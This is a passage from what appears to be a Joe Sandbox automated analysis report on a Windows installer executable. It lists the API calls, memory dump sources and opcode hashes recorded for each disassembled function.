                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                                              • Instruction ID: 63966a6383d29ffdfa22f329224652c183dd70f9b2d60f481563a5b1fdafd2c8
                                              • Opcode Fuzzy Hash: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
                                              • Instruction Fuzzy Hash: 6DF06232650224A6DB10BBB9DC86BAD37E89B44758F208537F601EA0E2D67CC8C18248

                                              Control-flow Graph

                                              control_flow_graph 478 40154d-40155c 479 401562-401568 478->479 480 40155e-401560 478->480 481 40156e-401599 call 40145c RegOpenKeyExW 479->481 480->481
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                                              • Instruction ID: 25f660db1a1e8629dce7ab52a77c94397c675d14e237935d7f32c5267cf96d12
                                              • Opcode Fuzzy Hash: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
                                              • Instruction Fuzzy Hash: E8F0377A250109BBD700DB59DD41FE637DCE744B94F148036FA09DB151C735E44187A9
                                              APIs
                                              • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: PathSearch
                                              • String ID:
                                              • API String ID: 2203818243-0
                                              • Opcode ID: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                                              • Instruction ID: 00f5228fbcba69d7f7f389f47c449123412ef94834c0b690fd6e23632fde5db3
                                              • Opcode Fuzzy Hash: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
                                              • Instruction Fuzzy Hash: ABE04F32304255AAF340DBA4DD49B9E73A4DB40728F20423AEA15F60D1E3B49A84C769
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                                              • Instruction ID: bd695a607233752ff1959b473a7ca1503adc94cd5dff5db9087338bb7c64902f
                                              • Opcode Fuzzy Hash: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
                                              • Instruction Fuzzy Hash: F0E08C322A0218BBCB219E91DE08AE73B5CEB047A2F008436B958E51D0D674D952DBF9
                                              APIs
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                                • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              • CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Char$Next$CreateDirectoryPrev
                                              • String ID:
                                              • API String ID: 4115351271-0
                                              • Opcode ID: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                                              • Instruction ID: d79b23296e172e3f7541ee3cb439833c7f4a864136be478e135bd67e808ea9fb
                                              • Opcode Fuzzy Hash: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
                                              • Instruction Fuzzy Hash: 54D09E11547D7561C56236663E46FDF151C8F52359F114077F540B51C25A6C0A8289ED
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                                              • Instruction ID: 4946e7aaa73dbe9c50503acfc76fe66090dc5a246f76b590ec387925aa062f70
                                              • Opcode Fuzzy Hash: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
                                              • Instruction Fuzzy Hash: 4EB09231140300AADA215F009E09F057B21AB90700F108824B291281F086712020EA0D
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 00401656
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                                              • Instruction ID: b7a5ace7ee108f6bfae9467569b9736203130378aa17b3a4f183cff96938e45a
                                              • Opcode Fuzzy Hash: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
                                              • Instruction Fuzzy Hash: 42D02233704200CBE700F7B8AE8942E33A4E71232D3200C3BD803F20A0D639C8C1822D
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
                                              • lstrlenW.KERNEL32(?), ref: 00405C90
                                              • GetVersionExW.KERNEL32(?), ref: 00405CEE
                                                • Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0
                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
                                              • FreeLibrary.KERNEL32(00000000), ref: 00405D98
                                              • GlobalFree.KERNEL32(?), ref: 00405DA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                              • API String ID: 20674999-2124804629
                                              • Opcode ID: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                                              • Instruction ID: 5cd628679c3206996b44c0f0d1c9f7c2e320434dbef64c8d82388663d9783bcf
                                              • Opcode Fuzzy Hash: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
                                              • Instruction Fuzzy Hash: A091407190061AEBDF109FA4CD88AAFBBB8EF44741F10407AE545F6190DB788A45CF69
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404494
                                              • GetDlgItem.USER32(?,00000408), ref: 004044A1
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
                                              • LoadBitmapW.USER32(0000006E), ref: 00404503
                                              • SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404559
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
                                              • DeleteObject.GDI32(?), ref: 0040457A
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
                                              • GetWindowLongW.USER32(?,000000F0), ref: 004046B0
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
                                              • ShowWindow.USER32(?,00000005), ref: 004046D0
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
                                              • ImageList_Destroy.COMCTL32(?), ref: 0040489D
                                              • GlobalFree.KERNEL32(?), ref: 004048AD
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
                                              • ShowWindow.USER32(?,00000000), ref: 00404A4A
                                              • GetDlgItem.USER32(?,000003FE), ref: 00404A55
                                              • ShowWindow.USER32(00000000), ref: 00404A5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $ @$M$N
                                              • API String ID: 1638840714-3479655940
                                              • Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                                              • Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
                                              • Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                                              • Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00404C16
                                              • GetDlgItem.USER32(?,000003EE), ref: 00404C25
                                              • GetClientRect.USER32(?,?), ref: 00404C62
                                              • GetSystemMetrics.USER32(00000015), ref: 00404C6A
                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
                                              • ShowWindow.USER32(?,00000008), ref: 00404D06
                                              • GetDlgItem.USER32(?,000003EC), ref: 00404D27
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
                                              • GetDlgItem.USER32(?,000003F8), ref: 00404C34
                                                • Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E
                                              • GetDlgItem.USER32(?,000003EC), ref: 00404D77
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
                                              • CloseHandle.KERNEL32(00000000), ref: 00404D8C
                                              • ShowWindow.USER32(00000000), ref: 00404DB3
                                              • ShowWindow.USER32(?,00000008), ref: 00404DB8
                                              • ShowWindow.USER32(00000008), ref: 00404DFF
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
                                              • CreatePopupMenu.USER32 ref: 00404E42
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
                                              • GetWindowRect.USER32(?,?), ref: 00404E6A
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
                                              • OpenClipboard.USER32(00000000), ref: 00404ED7
                                              • EmptyClipboard.USER32 ref: 00404EDD
                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
                                              • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404EF3
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404F29
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
                                              • CloseClipboard.USER32 ref: 00404F3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                                              • Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
                                              • Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                                              • Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040405A
                                              • SetWindowTextW.USER32(?,?), ref: 00404087
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040413F
                                              • CoTaskMemFree.OLE32(00000000), ref: 0040414A
                                              • lstrcmpiW.KERNEL32(%AtlasTreasures%,0044FD98,00000000,?,?), ref: 0040417C
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
                                              • lstrcatW.KERNEL32(?,%AtlasTreasures%), ref: 00404188
                                                • Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                                • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                                • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              • GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
                                              • SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                              • String ID: %AtlasTreasures%$A
                                              • API String ID: 2246997448-3344573410
                                              • Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                                              • Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
                                              • Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                                              • Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
                                              • lstrcatW.KERNEL32(00465470,\*.*), ref: 004065C8
                                              • lstrcatW.KERNEL32(?,004082C8), ref: 004065E8
                                              • lstrlenW.KERNEL32(?), ref: 004065EB
                                              • FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
                                              • FindClose.KERNEL32(00000000), ref: 004066C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: \*.*$pTF
                                              • API String ID: 2035342205-2155356189
                                              • Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                                              • Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
                                              • Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                                              • Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D
                                              APIs
                                              • CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID:
                                              • API String ID: 542301482-0
                                              • Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                                              • Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
                                              • Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                                              • Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
